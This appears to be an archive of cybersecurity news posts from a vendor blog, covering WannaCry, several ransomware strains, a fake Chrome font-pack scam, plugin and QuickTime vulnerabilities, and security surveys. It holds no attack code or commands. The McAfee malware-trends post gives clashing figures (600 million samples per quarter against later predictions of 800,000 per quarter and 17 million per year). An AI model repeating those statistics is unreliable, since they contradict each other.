The version of WannaCry ransomware used in Friday’s attacks has been blocked, although new WannaCry ransomware variants have been detected. U.S Escapes WannaCry Relatively Unscathed The total number of computers infected with WannaCry ransomware is now believed to be around 300,000, although the United States escaped relatively unscathed, according to the U.S. Department of Homeland Security (DHS). While it is still unclear exactly how many U.S. organizations have been affected, fewer than 10 organizations have reported a WannaCry ransomware attack to DHS. The ransomware attacks have now stopped, although organizations that have experienced an infection that has resulted in files being encrypted must recover those files from a backup, accept data loss, or pay the attackers for the decryption keys. The attackers have so far made around $81,000 from their ransomware campaign, according to @actual_ransom. With a ransom payment of $300 per infected device, many payments have already been made; however, given the number of devices locked by the ransomware, most victims are not paying the attackers to unlock their files. WannaCry ransomware encryptions were stopped when a security researcher (Malware Tech) from the UK discovered a kill switch while investigating the worm code. In an apparent effort to avoid running in a sandbox or virtual environment, a check was performed on a nonsense domain. If a connection to that domain was successful, the ransomware would exit. If connection to the unregistered domain failed, the ransomware would proceed and encrypt files. By registering that domain, Malware Tech stopped further encryptions. WannaCry Victims Appear to Have Been Contacted by the Attackers In an apparent effort to increase the profits from the campaign, the attackers have generated pop up messages on affected computers saying, “I have already sent decryption keys to many customers who had sent me the correct amounts of bitcoin, and I guarantee the decryptions for such honest customers.” While this message could indicate the attacker has access to infected computers, it is possible that the message was pre-programmed to appear. Paying ransom demands only...
by G Hunt |
May 5, 2017 |
Cybersecurity News, Internet Security News
Pew Research has recently published the results of a study that set out to test cybersecurity awareness in America and find out more about the risks individuals are unwittingly taking when venturing online. The study was conducted on 1,055 adult Americans, who were each asked 13 cybersecurity questions of varying difficulty. Questions included what HTTPS means, what two-factor authentication is, what private browsing means and the level of protection offered by insecure WiFi networks using a VPN. The study showed that cybersecurity awareness in America is poor and consumers are potentially taking major risks online. While all 13 questions should have been answered correctly ‘security aware’ individuals, only 1% were able to answer all questions correctly. A substantial majority of adult Americans that took the questionnaire were only able to answer two of the questions correctly. The median was 5 correct answers out of 13, the mean 5.5, and only 20% of participants were able to answer more than 8 answers correctly. Three quarters of participants were able to identify the most secure password in a list and 73% of respondents were aware that the use of public WiFi networks carries a major risk and should not be used for sensitive activities such as online banking, even if the WiFi network required the use of a password. However, cybersecurity awareness was much worse for all other areas tested by the survey. Just over half of respondents were able to correctly identify what a phishing attack involved, which is a particularly worrying result considering how widespread the use of phishing is. Ransomware has been heavily reported in the press and attacks on businesses have soared, yet fewer than half of survey participants were able to correctly identify what ransomware is and only 46% knew that email was not encrypted by default. Worryingly, only 33% of participants were aware that HTTPS meant traffic was encrypted, suggesting many are entering credit card information into unencrypted websites. Only one in ten participants were able to correctly identify multi-factor authentication, with 71% thinking CAPTCHA was a form of multi-factor authentication rather than...
by G Hunt |
April 21, 2017 |
Cybersecurity News, Internet Security News
McAfee has issued a new threat report detailing 2016 malware trends. The decline in new malware samples in the final quarter of 2016 does not suggest that 2017 will see a continued fall in new malware, but the opposite, according to McAfee Labs. 2016 malware trends follow a similar pattern to 2015. The first quarter saw large volumes of new malware discovered, followed by a steady decline over the next three quarters. The same trend was identified in 2015. Far from that decline continuing into 2017, the first quarter figures – which will not be made available until the summer – are likely to follow a similar trend and involve a massive in malware numbers in the first three months of 2017. Further, there has been a steady increase in the number of new malware samples detected year on year, from around 400 million per quarter in 2015 to more than 600 million per quarter in 2016. If that trend continues into 2017, this year is likely to see around 800,000 new malware samples detected each quarter on average. McAfee predicts that there will be around 17 million malware samples by the end of this year. McAfee reports that ransomware has increased steadily over the course of 2016, starting the year with around 6 million samples and finishing the year with over 9 million detected samples. However, the final quarter of 2016 saw a sharp drop in ransomware due to a decline in generic ransomware detections and a fall in the use of Locky. There have been relatively few new Mac OS malware samples detected over the past two years, although Q3, 2016 saw new Mac OS malware increase from around 10,000 to 50,000, with a massive rise to around 320,000 new samples in the final quarter of 2016. By the end of 2016, the total number of Mac OS malware rose to more than 450,000, from around 50,000 at the end of Q4, 2015. The increase mostly involved bundled adware. The switch from exploit kits to email as the main attack vector is evident from the figures for new macro malware, with a sharp rise in Q2, 2016 and a continued rise in Q3. In Q1, there were around 60,000 detections, in Q3 that figure had risen to more than 200,000. The public sector was most affected by security breaches...
by G Hunt |
March 22, 2017 |
Cybersecurity News, Internet Security News
Educational institutions have been warned about Moodle security flaws that could allow cybercriminals to attack web servers, gain administrative privileges and run malicious code. Many educational institutions use the Moodle platform for their e-learning websites. The platform allows students to access interactive online courses. There are almost 80,000 websites that use the open source platform, many of which are operated by schools, colleges and universities. On Monday this week, Security researcher Netanel Rubin discovered a vulnerability – tracked as CVE-2017-2641 – that could be exploited to run malicious PHP code on an unpatched Moodle server. He pointed out on his blog that the problem does not lie with a single critical security flaw, but a number of smaller vulnerabilities which can be exploited when combined. An attacker could exploit the Moodle security flaws and create hidden administrative accounts; however, in order to exploit the flaws, it would be necessary for the attacker to have an account on the platform. It does not matter what type of account the attacker has, provided it is not a guest account. Since more than 100 million individuals log onto the websites to access courses, obtaining a user account would not pose too much of a problem. The Moodle security flaws could be exploited by attackers to install backdoors in the system allowing persistent access to data stored on a Moodle server, and there is data aplenty. Highly sensitive information about students is stored on the system, including personal information, grades and test data. According to Rubin, the Moodle security flaws affect all versions of the platform tested, including “3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and other unsupported versions.” Rubin pointed out that such a large system – Moodle contains more than 2 million lines of PHP code – will almost inevitably have numerous vulnerabilities. In this case, the code has been written by multiple authors which has led to logical flaws being introduced. The problem comes from having too much code, too many developers and a lack of documentation. That is a problem for any system of this size, not just...
by G Hunt |
March 15, 2017 |
Cybersecurity News, Internet Security News
2017 has already seen numerous cyberattacks on educational institutions. 2017 has started particularly badly for the education sector and there is no sign of the cyberattacks abating any time soon. But why is the education sector being so heavily targeted by hackers, cybercriminals, and scammers? It is easy to see why cyberattacks on financial institutions occur. There are substantial funds to be plundered. Cyberattacks on healthcare organizations are also common. Those organizations hold vast quantities of data; data that can be sold for big bucks on the black market and used for all manner of fraud: Medical fraud, identity theft, tax fraud, and insurance fraud for example. However, the education sector is similarly being targeted. K12 schools, colleges, and universities have all been attacked and those attacks have soared in 2017. The list of educational institutions that have reported cyberattacks in 2017 is long. Barely a day goes by without another educational institution being added to the list. Many of the cyberattacks on educational institutions are random, but it is becoming increasingly clear that the education sector is being targeted. There are many reasons why the attacks have soared in recent months. Educational institutions hold vast quantities of valuable data, they have considerable computer resources that can be used by cybercriminals, and in contrast to other industry sectors, educational institutions are not as heavily regulated when it comes to cybersecurity protections. Defenses are relatively poor and educational organizations tend to have relatively few IT staff compared to the corporate sector. In short, the potential profits from cyberattacks on educational institutions are high and attacks are relatively easy to perform. For cybercriminals that is an excellent combination. What Data are Cybercriminals Attempting to Steal? K12 school systems have been targeted by criminals in order to gain access to student data. Social Security numbers of minors are extremely valuable. Dates of birth and Social Security numbers can be used for identity theft and fraud and in the case of minors, fraud is less likely to be identified quickly. Minors...
by G Hunt |
March 14, 2017 |
Cybersecurity Advice, Internet Security News
At a recent cybersecurity conference, Director of the FBI, James B. Comey, has given valuable ransomware advice for healthcare providers to help them tackle the growing threat of attack. Comey confirmed that ransomware is now the biggest cybersecurity threat for the healthcare industry. Healthcare providers must be prepared for an attack and be able to respond quickly to limit the harm caused. Ransomware is used to encrypt files and databases to prevent the victim from accessing essential data. Since healthcare providers need access to patient health information in order to provide medical services, healthcare providers are being extensively targeted. If data access is essential, victims are more likely to pay ransom demands. However, Comey explained that ransoms should never be paid. If a ransom is paid, this only encourages cybercriminals to attack more businesses. The payment of a ransom sends a message to other cybercriminals that the attacks are profitable. Ransomware can be sent randomly via spam email or distributed by malicious websites. Cybercriminals also install ransomware once access to a computer system has been gained and data have been exfiltrated. Tackling the problem involves implementing a range of cybersecurity defenses to prevent attacks and ensuring data can be recovered and business processes can continue if ransomware is installed. In the case of the latter, data backups are essential. All critical data should be backed up on a daily basis at a minimum. Data backups can also be encrypted by ransomware, so it is essential that backup devices are not left connected to computers or servers. Data should ideally also be backed up in the cloud. One of the best pieces of ransomware advice for healthcare providers is to prepare for an attack now. Healthcare organizations should not wait until a ransomware infection occurs to decide how to respond. Not only should policies be developed that can be implemented immediately following a ransomware attack, business continuity plans must be tested prior to a disaster occurring. The same goes for backups. Many organizations have been attacked with ransomware only to discover that they have been unable...
by G Hunt |
February 23, 2017 |
Cybersecurity News, Internet Security News
A security researcher has discovered a new Google Chrome scam that infects victims’ computers with malware. In contrast to many malware-downloading scams, the new Google Chrome scam is highly convincing and is certain to result in many malware infections. Hackers have installed malicious JavaScript on a number of compromised WordPress websites. The JavaScript modifies the text on a compromised webpage when it is visited using the Google Chrome browser. The text on the website appears as if Google Chrome cannot read the font, with the characters on the site replaced with random fonts and symbols. A popup appears on screen informing the visitor that “the “HoeflerText” font wasn’t found” by Google Chrome. The visitor is told that the webpage they are trying to view cannot be displayed correctly as a result. Visitors are prompted to update their Chrome browser to include the new font by downloading a “Chrome Font Pack.” The Google Chrome scam is convincing. The popup uses the Chrome logo and looks official, with colors and branding that Google would use on its popup windows. The shading used for the “Update” button on the popup window is also accurately reproduced. Furthermore, HoeflerText is a true font. If the user opens a new tab on their browser and Google’s the font, they will discover the font is real, making the Google Chrome scam seem entirely plausible. Clicking the update button will trigger a download of the update file – ChromeFontv7.5.1.exe – which is an executable containing the malware. While attempting to run the executable would normally result in an anti-virus warning being displayed, relatively few anti-virus products are detecting the ChromeFontv7.5.1.exe file as malicious. VirusTotal shows that just 9 out of 59 AV products identify the file as malicious. The Google Chrome scam was uncovered by NeoSmart Technologies researcher Mahmoud Al-Qudsi. He reports that while the Google Chrome scam is highly convincing, there are two signs that the update is not real. First, regardless of the version of Chrome used, the popup says the user has Chrome version 53. The second sign of the scam is the popup says the update file is called...
by G Hunt |
January 20, 2017 |
Cybersecurity Advice, Internet Security News
There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm. However, there is another reason why the use of web filters in libraries is important. This has been clearly demonstrated this week in St. Louis, MO. Web Filters in Libraries are Not Only About Internet Control This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but do little else. All book borrowing stopped since it is not possible to for library staff to log borrowing on the checkout system. Patrons have also been prevented from gaining access to the Internet. Even the email system has been locked and taken out of action. What kind of computer malfunction causes the entire network of computers to stop working? The answer is ransomware. Ransomware is malicious software that has been developed with one sole purpose: To encrypt system and data files to prevent access. Once downloaded, ransomware locks files with powerful encryption preventing files from being accessed. The attacker then sends a ransom demand offering the unique keys to decrypt files in exchange for payment. Typically, attackers demand $500 in an anonymous currency such as Bitcoin to unlock each computer that has been attacked. In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library systems’ computers – across 16 locations – were attacked and encrypted. Some ransomware variants also act as information stealers. Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen. The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only...
by G Hunt |
November 24, 2016 |
Cybersecurity News, Internet Security News
In the past few days, Facebook Messenger Locky ransomware attacks have been discovered, exploit activity has increased, and malicious spam email volume has increased. Organizations now need to defense against a wide range of attack vectors 2016 – The Year of Ransomware 2016 has seen an explosion in the use of ransomware by cybercriminals and there is no sign of that changing in the near future. More than 200 ransomware families have now been identified, one of the most dangerous being Locky. Locky ransomware was first discovered in February this year, but it has fast become one of the most prolific ransomware variants and has infected thousands of computers. No organization is immune to attack, although the gang behind the infections have been extensively targeting healthcare organizations. A number of U.S. healthcare providers have been forced to pay a ransom demand to recover their data. Rather than cybercriminals having to break through company defenses to gain access to data, then exfiltrate files, and sell those data on the black market – a process that can take weeks before payment is received – ransomware is a quick and easy revenue generator. Payments are made within a few days of infection as many companies cannot continue to function without access to their data. It is not even necessary for cybercriminals to develop their own ransomware. The malicious file-encrypting software can be ‘hired’ from the authors. By using ransomware-as-a-service, anyone with an Internet connection could run a ransomware campaign. Little skill is needed and attacks result in fast payment. It is therefore no surprise that the file-encrypting software has become so popular. Infection can occur via malicious adverts, exploit kits, or via spam email. All of those infection vectors allow the attackers to bypass traditional cybersecurity defenses such as firewalls. Some headway has been made by security researchers and decryptors have been developed for some ransomware variants. Wildfire, Chimera, Shade, TeslaCrypt, and CoinVault have all been cracked. However, Locky has so far resisted security researchers’ efforts to crack it. The authors of the crypto-ransomware are...
by G Hunt |
July 8, 2016 |
Cybersecurity News, Internet Security News
If you want to keep your computers and network protected, you should ensure that browsers are patched as soon as updates are made available. However, end users may be fooled into taking action to keep their computers secure and inadvertently use fake Firefox updates. Fake FireFox Updates Used to Install the Kovter Trojan Fake Firefox updates are being used by the gang behind the Kovter Trojan. A new version of the fileless malware has been identified recently, and it is infecting users by posing as a fake Firefox update. The cybercriminal gang behind Kovter frequently tweak the malware and come up with new ways of infecting end users. Kovter is a particular worry as it can be particularly difficult to detect. Being fileless, there are no actual files to detect. The malware resides only in the memory, and it ensures it is reloaded into the memory each time a computer is rebooted with a Windows registry component. Kovter can perform a range of malicious activities, such as redirecting users to malicious websites, performing click fraud, downloading other malware, and now also encrypting files. The latest variant discovered by CheckPoint also has ransomware capabilities. When users visit a malicious or infected website they are presented with fake Firefox updates and are urged to download the latest version to keep their computers secure. Researchers at Barkly discovered that the gang behind the latest Kovter campaign are using a legitimate certificate to fool antivirus engines. The certificate was issued to Comodo, although it has since been revoked. Anti-virus engines are also now being updated to detect the malware and block its download. Preventing Drive by Malware Downloads There are a number of steps that can be taken to prevent drive-by downloads of malware such as Kovter. Policies should be implemented that prohibit end users from performing software updates, which should be left to the IT team to handle. Patch management policies should be developed and implemented to make sure that when software updates and patches are issued, they are installed promptly or preferably automatically. Browsers should never be updated outside the normal update process. To...
by G Hunt |
June 30, 2016 |
Cybersecurity News, Internet Security News
Mobile ransomware may not be nearly as prevalent as its PC counterpart, but attacks on mobile devices are on the rise according to a new report issued by anti-virus firm Kaspersky Lab. Kaspersky Lab assessed thwarted ransomware attacks on mobile users over a period of two years and saw that the numbers of attacks doubled, signifying a worrying new trend. Between 2014 and 2015, 2.04% of malware attacks on mobile users involved ransomware. Between 2015 and 2016, the percentage of ransomware attacks rose to 4.63%. During that period, 136,532 attacks took place. Kaspersky Lab noted that the ransomware used to infect mobile devices differs considerably from the strains used to infect PC users. While Locky, CryptXXX, and RAA are now the main threats affecting PCs, the main mobile ransomware strains currently being used are Fusob, Small, Svpeng, and Pletor. Mobile ransomware tends not to use encryption to lock files, instead malicious software is developed that blocks users from accessing their device. Oftentimes, this is achieved with a simple HTML overlay. Encryption is more effective on PCs because many users fail to back up their data, or when they do they leave their backup devices connected. Many strains of PC ransomware are able to delete backup files or encrypt them, leaving end users with no alternative but to pay the ransom or lose their data forever. Many mobile users automatically backup their data in the cloud. If data is ever lost or encrypted, files can easily be recovered. However, overlays prevent the user from being able to access their files from the device. With mobile devices victims cannot simply take out a hard drive and plug it into another machine and manually remove malicious files. If an infection takes place, users either have to pay the ransom or replace their device. Provided the ransom is lower, many users will end up paying. Without the need for encryption, the development of mobile ransomware is considerably cheaper. The ransoms that can be demanded may be lower than for PC infections, but campaigns can be highly profitable for cybercriminals. Criminal gangs are also using an affiliate model to spread infections. There is usually no...
by G Hunt |
June 29, 2016 |
Cybersecurity News, Internet Security News
A new threat has recently been discovered by security researchers at Phishme: Bart ransomware. The new ransomware variant is not as sophisticated as Locky and Samsa, but it is still highly effective and poses a risk to businesses. Should end users be fooled into opening spam emails, file recovery will only be possible via backups if the ransom demand is not paid. Bart Ransomware Locks Files in Password-Protected ZIP Files Bart Ransomware bears a number of similarities to other ransomware variants that have been discovered in recent months. If installed on a device, media files, photos, documents, spreadsheets, databases, and a host of other files are located and encrypted. Bart ransomware also encrypts .n64 ROM files, which was previously unique to Locky ransomware. Bart is also delivered using the same Dridex botnet that was used to deliver Locky. Bart ransomware also uses a payment interface that looks very similar to Locky. However, there are notable differences to Locky and other ransomware variants. Bart demands a particularly high payment from its victims. Rather than a demand of 0.5 Bitcoin, Bart asks for 3 Bitcoin per infected machine – Approximately $1988 per device. There are also notable differences in the method used to encrypt files. Bart doesn’t use public key cryptography. Files are added to zip files which are then password protected. In order to unzip files, a password must be supplied. These passwords are only supplied to the victim if the sizeable ransom is paid. Bart also does not use the typical command and control center infrastructure. Most new ransomware variants communicate with the attackers’ command and control center before files are encrypted, but that does not appear to happen with Bart. New Ransomware Variant Delivered via Spam Emails The campaign uses spam emails to deliver malicious Javascript files, which are disguised as image files. End users may be fooled into opening the attachments in the belief they are simply images. However, if the attachments are opened, JavaScript is executed and Rocketloader is downloaded. Rocketloader installs Bart ransomware and is also capable of downloading a variety of other malware. The...
by G Hunt |
June 21, 2016 |
Cybersecurity News, Internet Security News
Security researchers have uncovered an entirely JavaScript based ransomware variant that is not only being used to lock infected devices with AES encryption, but also to deliver the Pony info-stealer. Pony is used to obtain users’ passwords and login credentials to launch further attacks. This means that while a ransom may have to be paid to regain access to important files, the victim is also highly likely to suffer further losses. JavaScript based malware is nothing new. Criminals have been using JavaScript files to infect devices with ransomware for some time, yet previously JavaScript has most commonly been used to download ransomware to infected devices. The latest threat exclusively uses JavaScript and requires no additional downloads. RAA Ransomware Delivered via Spam Email The attack starts with a spam email containing a malicious attachment. The attached file appears to be a document, but it is actually a malicious JavaScript file. Opening the file will result in a fake Word document being created in the user’s My Documents folder. That file is then opened automatically leading the victim to believe that the file attachment is corrupted. However, processes will still be running in the background. The malicious JavaScript file – dubbed RAA ransomware – does not contain any cryptographic functions, instead it uses the CryptoJS library to lock files with AES encryption. First, all drives – local, network, and portable – are scanned for specific file extensions, including documents and spreadsheets (DOC, RTF, XLS, CSV, PDF), compressed files (ZIP, RAR), image files (JPG, PSD, PNG, DWG, CDR, CD), database files (DBF, MDF), and LCD disk images. Once the targeted files are identified, the JavaScript based ransomware then encrypts those files using AES encryption and replaces the extension with “.locked.” To make it harder for the victims to recover from the infection without paying the ransom, RAA ransomware also deletes the Windows Volume Shadow Copy Service (VSS) as well as all shadow copies. Finally, files are created on the Desktop which detail how much must be paid to obtain the decryption keys and instructions on how payment must be made. JavaScript...
by G Hunt |
June 8, 2016 |
Cybersecurity News, Internet Security News
A new WordPress plugin vulnerability was recently uncovered that is being actively exploited. The vulnerability affects the WP Mobile Detector plugin, which is used to determine whether a website is being viewed on a desktop or mobile device. The plugin then serves a compatible WordPress theme. The plugin was one of the first to be able to distinguish whether a device was a standard mobile or a Smartphone, and as of the start of May, the plugin had been installed on more than 10,000 WordPress websites. WP Mobile Detector WordPress Plugin Vulnerability Exploited to Install Porn Spam Doorways The WordPress plugin vulnerability was detected by Plugin Vulnerabilities, which noticed a HEAD request for a file called /wp-mobile-detector/resize.php, even though the plugin had not been installed on the site. Researchers at Plugin Vulnerabilities concluded that the request was made by an individual attempting to determine whether the plugin had been installed in order to exploit a vulnerability. After searching for reports of a known vulnerability and finding none, researchers investigated further and discovered the plugin had an arbitrary file upload vulnerability. The vulnerability is straightforward to exploit and can be used to upload malicious files to the cache directory, host spam content, redirect users to malicious websites, or install malware. Since the plugin performed no checks to validate input from untrusted sources, an attacker would be able to insert a src variable containing a malicious URL and PHP code. Many of the infections uncovered so far have involved the installation of porn spam doorways. Sucuri reports that the WordPress plugin vulnerability has been exploited since May 27. Since the discovery of the WP Mobile Detector plugin flaw last week, the plugin was temporarily removed from the WordPress plugin directory. The developer of the WP Mobile Detector plugin has now fixed the vulnerability. Any site owner that has the plugin installed should immediately update to version 3.6. However, simply updating to the latest version of the plugin will not remove malware if it has already been installed. If web shells have already been installed,...
by G Hunt |
May 26, 2016 |
Cybersecurity News, Internet Security News
Surprisingly, after ESET sent a request for the TeslaCrypt ransomware master key to the criminal gang behind the attacks, they responded by making the decryption key public and even issued an apology. The surprise move signals the end of the ransomware that was used primarily to target gamers TeslaCrypt Ransomware Master Key Released So does the release of the TeslaCrypt ransomware master key mean that the attacks will now stop? The answer to that is a little complicated. Attacks using TeslaCrypt will slow and stop soon, and even if some individuals have their computer files locked by the ransomware they will not need to pay a ransom. Once the TeslaCrypt ransomware master key was made public, security companies started work on decryption tools to unlock infections. ESET have added the key to their TeslaCrypt decryption tool, and Kaspersky Lab similarly used the master key to update the decryption tool it had been using to unlock earlier versions of the ransomware. That does not mean that the criminal gang behind the campaign will stop its malicious activity. It just means that the gang will stop using TeslaCrypt. There are many other types of ransomware that can be used for attacks. In fact, it would appear that TeslaCrypt has now simply been replaced with a new form of ransomware called CryptXXX. According to ESET, many of the distributers of TeslaCrypt have already switched to CryptXXX. Under normal circumstances, contacting a criminal gang and asking for the TeslaCrypt ransomware master key would not have worked. Attackers running profitable ransomware campaigns are unlikely to respond to a polite request asking to unlock an infection without paying a ransom, let alone supply a master key that can be used to unlock all infections. The reason for the release is TeslaCrypt was already being phased out. ESET researcher Igor Kabina noticed that TeslaCrypt infections were slowing, which signaled that either the gang behind the ransomware was phasing it out in favor of a new malware, or that a new and updated version of TeslaCrypt would soon be released. Kabina decided to contact the attackers through the channels set up to allow victims to contact the gang and...
by G Hunt |
May 20, 2016 |
Cybersecurity News, Internet Security News
A new study has recently been published showing the impact of security breaches on brand image, and how the behavior of consumers changes when companies experience data breaches that expose private data. Cyberattacks are now taking place with such frequency that data breaches are now to be expected. It is no longer a case of whether a security breach will occur, it is now just a case of when it will happen. Even with the best protections in place to protect sensitive data, breaches will still occur. Many consumers are aware that the current threat levels are greater than ever and that cyberattacks will occur. However, how do consumers react to breaches of their personal information? Do they forgive and forget or are they taking their business elsewhere? What is the Impact of Security Breaches on Brand Image? The FireEye study set out to examine the impact of security breaches on brand image. 2,000 interviews were conducted on consumers in the United States to find out whether security incidents changed behavior and whether data breaches altered perceptions of companies and trust in brands. The results of the survey clearly show that the failure to invest in robust cybersecurity defenses can have a major impact on revenue. 76% of surveyed consumers claimed they would take their business elsewhere if they believed a company’s data handling practices were poor or that the company was negligent with regard to data security. 75% of respondents said they would likely stop making purchases from a company if they felt that a security incident resulted from a failure of the company to prioritize cybersecurity. Loss of business is not the only problem companies will face following a data breach. If a breach of personal information occurs and data are used by criminals for identity theft or fraud, 59% of consumers would take legal action to recover losses. Even when companies take action to mitigate the risk of losses being suffered by consumers – such as providing identity theft protection services – brand image remains tarnished. Reputation damage after a data breach is suffered regardless of the actions taken by companies to mitigate risk. It can also take...
by G Hunt |
April 28, 2016 |
Cybersecurity Advice, Internet Security News
Organizations are investing in technology to ensure the perimeter defense are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests more than half of data breaches are caused by employee errors, oversights, and negligence. Employees are under increasing pressure to get more work completed in less time. This can easily lead to errors being made or shortcuts being taken. Employees may be security minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter security defenses in place, simple mistakes can lead to disaster. Email Borne Attacks Are Still A Major Risk During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even with the reduced volume the threat from spam email is considerable. The Forrester report indicates spam email volume has dropped from almost 89% of all emails in 2014 to 68% of emails in 2015. However, over 91% of all spam emails contain a malicious link and 2.34% contain malicious email attachments. Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about from people they do know? There has been an increase in business email compromise attacks in recent months. These attacks involve the sending of spam and phishing emails from within an organization. These emails are more likely to result in malicious email attachments being opened and links being clicked than emails from strangers. All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization. Employees are aware never to run an executable file that has been sent via email...
by G Hunt |
April 15, 2016 |
Cybersecurity Advice, Internet Security News
Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to depreciate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent vulnerabilities from being exploited. Apple intends to keep supporting the OSX version. The latest vulnerabilities in QuickTime for Windows (named ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities, both of which allow an attacker to write data outside of an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required. In order for an attacker to exploit these vulnerabilities the target would be required to open a malicious file or visit a malicious website. One of the vulnerabilities affects the moov atom (ZDI-16-241) while the other (ZDI-16-242) involves a flaw with atom processing. Both could allow data to be written outside of an allocated heap buffer by providing an invalid index. This would allow code to be executed in the context of Windows QuickTime player. Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software The discovery of the new vulnerabilities in QuickTime for Windows spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime ASAP in order to stay protected. These two new vulnerabilities are unlikely to be the last to be discovered. Leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are understood to have been conducted, but it is only a matter of time before the vulnerabilities are added to exploit kits. Whenever a software developer takes the decision to stop supporting software it means users must find alternatives. IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible. Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML...
by G Hunt |
March 19, 2016 |
Cybersecurity News, Internet Security News
Cybercriminals are moving away from email attacks and are concentrating on web-based exploits to deliver malware. Email remains a major source of malware, but web-based attacks are now much more prevalent. Web-Based Exploits Increasingly Used to Deliver Malware A recent report from Palo Alto Networks showed that out of just over 68,000 malware samples collected, 25% were delivered via email, whereas 68% were delivered during web-browsing. Those figures were for known malware. When it comes to undetected samples, the figures for web-browsing rose to 90% compared to just 2% delivered via email. Undetected malware samples are those which are not detected by traditional anti-malware and anti-virus solutions. It is easy to see why web-based exploits are being favored by cybercriminals. It takes much longer for web-based exploits to be detected by anti-virus software than email-based attacks. Palo Alto reports that it takes four times as long to detect web-based exploits as it does email-based attacks. Attackers are also able to tweak web-based malware in real-time. Email-based malware needs to be sent out and changes can only be made for each new campaign. In the case of email-based malware attacks, the malicious software is relatively easy to detect by AV companies. They are able to give each malware sample a signature, which makes it much easier to block attacks. In the case of web-based malware this is a much harder task. The malware can be tweaked in real-time, making it harder for AV companies to capture and create a signature. A web server on which malware is hosted can be configured to re-code the malware automatically and generate many thousands of unique malware. Capturing and adding a signature to each simple takes too long. There are many methods that can be employed to reduce the risk of malware infections from web browsing, although one of the easiest preventative steps to take is to use a web filtering solution such as WebTitan. WebTitan allows organizations to carefully control the websites that can be accessed by end users. Palo Alto reported that HTTP proxies were frequently used in malware delivery. The blocking of HTTP proxies and web anonymizers...
by G Hunt |
March 18, 2016 |
Cybersecurity News, Internet Security News
A recent study conducted by the Ponemon Institute on behalf of IBM investigated web application security visibility. The report revealed for the majority of organizations there is none. When it comes to application security, many companies are in the dark and either do not test the apps they use, or do not address the vulnerabilities they discover when they do. 640 application development and security professionals were asked questions about application security and the steps being taken to secure apps. The study also aimed to get an answer to the question, how much do organizations know about the security of the applications they are using on a day to day basis? The results of the survey are worrying. More than a third of companies (35%) perform no application security testing. Consequently, they are unaware if the apps they use have security vulnerabilities. Worse still, 69% of respondents said they were not aware of all of the apps and databases that were in use in their organization. Application Security Visibility Needs to be Improved The study also revealed that more than two thirds (67%) of organizations do not have overall visibility into the state of application security in their respective companies. Out of the organizations that do perform application security testing, more than half do not take steps to address security vulnerabilities they discover. 34% of respondents said urgent security vulnerabilities are not being fixed and 43% said web application security was not a priority in their organization. When asked why thorough testing of applications does not take place, 56% of respondents said it was due to time constraints and organizational pressure to release applications quickly. 55% said that their organization’s developers are too busy to work on application security issues and 70% said they believed their organization invested too little in securing web applications and that insufficient resources were allocated to the task. Developers do not feel that it is their job to ensure applications are secure, and that this task should be conducted by information security professionals employed by their organizations. Another issue is web...
by G Hunt |
March 12, 2016 |
Internet Security News, Network Security
Effective enterprise patch management policies can greatly improve security posture and prevent cyberattacks; however, many enterprise IT staff are confused about patch management. A new survey conducted by Tripwire suggests that InfoSec staff often confuse patch management with vulnerability mitigation. The complexity of enterprise patch management also leaves many security professionals unsure about when patches should be applied and the impact of applying patches. The Complexity of Enterprise Patch Management Causes Problems for Many IT Security Professionals The Tripwire survey was conducted on 480 IT security professionals and asked questions about enterprise patch management policies at their organizations. The results show that IT staff are struggling to ensure that all systems are maintained in a fully patched state. 67% of respondents said that at least some of the time, they are unsure about which patches need to be applied to certain systems. The complexity of enterprise patch management is a problem. For instance, a patch may be issued to address Adobe Flash vulnerabilities, but it comes bundled with Google Chrome updates. It addresses Flash vulnerabilities in Chrome, where Adobe Flash is embedded, but does not address standalone installations or Flash vulnerabilities in other browsers. 86% of respondents said that issues such as this mean they find it difficult to understand the impact of a patch. It is all too easy for security vulnerabilities to remain after a patch has been applied. Patches are released that address multiple security vulnerabilities, but they do not address those vulnerabilities across all systems. The application of a patch will not necessarily remediate a security vulnerability entirely. According to Tripwire, ““The relationship between patches and vulnerabilities is far more complex than most people think.” There is also considerable confusion between patches and software upgrades. When it comes to addressing security vulnerabilities, a patch may address some, an upgrade may address others, and there is often some overlap. Because of this, organizations struggle to ensure that all software is properly patched and fully up to...
by G Hunt |
November 23, 2015 |
Internet Security News
